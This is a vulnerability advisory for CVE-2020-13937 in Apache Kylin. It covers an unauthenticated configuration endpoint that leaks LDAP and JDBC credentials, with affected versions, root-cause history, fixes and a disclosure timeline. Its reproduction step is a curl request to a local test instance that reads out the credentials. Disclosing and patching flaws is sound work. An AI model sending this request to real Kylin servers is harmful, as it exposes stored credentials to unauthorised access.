CVE: CVE-2020-13937

Tested Versions:

• All versions starting from 2.0.0 up to 2.3.2, all versions starting from 2.4.0 up to 2.4.1, all versions starting from 2.5.0 up to 2.5.2, all versions starting from 2.6.0 up to 2.6.6, all versions starting from 3.0.0 up to 3.0.2, version 3.1.0

Product URL(s):

• http://kylin.apache.org/

There is an unauthenticated configuration disclosure via /kylin/api/admin/config GET API Endpoint.

The getConfig() method of AdminController.java handling /kylin/api/admin/config endpoint did not include any security checks, which allowed an unauthenticated user to disclose all Kylin configuration settngs, which includes sensitive information such as LDAP and JDBC credentials.

Reproduction Steps:

1. Follow the steps at https://kylin.apache.org/docs/install/kylin_docker.html to get Kylin up and running
2. Execute the following command: curl http://127.0.0.1:7070/kylin/api/admin/config
3. Notice that the JSON response returned contains all configured settings in kylin.properties (/home/admin/apache-kylin-3.1.0-bin-hbase1x/conf/kylin.properties in Docker container)

Note: This vulnerability can be exploited regardless of whether kylin.security.profile is being set to testing (default for Docker image), ldap or saml.

Root Cause Analysis:

In /server-base/src/main/java/org/apache/kylin/rest/controller/AdminController.java, the getConfig() method which handles the /kylin/api/admin/config GET API endpoint does not ensure that the user is an admin.

This vulnerability has existed since the inception of the project. In an October 2014 commit, there is an admin check for the endpoint which had been commented out. Fast-forwarding to commit e3fe6b7 made in April 2017, it appears that Kylin developers were aware that not performing the necessary admin check when obtaining the configuration properties is indeed a critical security vulnerability, and had tracked this issue as KYLIN-1664 internally.

In commit 4629d84 made in December 2017, Kylin developers attempted to mitigate the vulnerability by introducing a new /kylin/api/admin/public_config endpoint that discloses only whitelisted configuration properties. In addition, /config PUT endpoint was also updated to include an admin check to prevent unauthenticated users from modifying the Kylin configuration.

Code refactoring was also performed in the above commit, removing the admin check (which was commented out) for /kylin/api/admin/config GET endpoint from the codebase without actually including an admin check for the endpoint or for fetching the configuration details.

This incomplete fix was unfortunately thought to have resolved the security vulnerability successfully. In the changelogs of Kylin 2.3.0, the above changes were indicated as [KYLIN-1664] - Harden security check for '/kylin/api/admin/config' API.

Recommendations:

Below are some recommendations on how this security vulnerability can be remediated.

1. Add @PreAuthorize(Constant.ACCESS_HAS_ROLE_ADMIN) decorator to getConfig() method in /server-base/src/main/java/org/apache/kylin/rest/controller/AdminController.java, or
2. Update access control checks defined in /server/src/main/resources/kylinSecurity.xml by replacing <scr:intercept-url pattern="/api/admin/config" access="permitAll"/> on line 256 (for testing and ldap security profilse) and line 308 (for saml security profile) to <scr:intercept-url pattern="/api/admin/config" access="hasRole('ROLE_ADMIN')"/>.

• 2020-07-17 Reported to Vendor
• 2020-07-18 Vendor acknowledged
• 2020-10-19 Vendor patched the vulnerability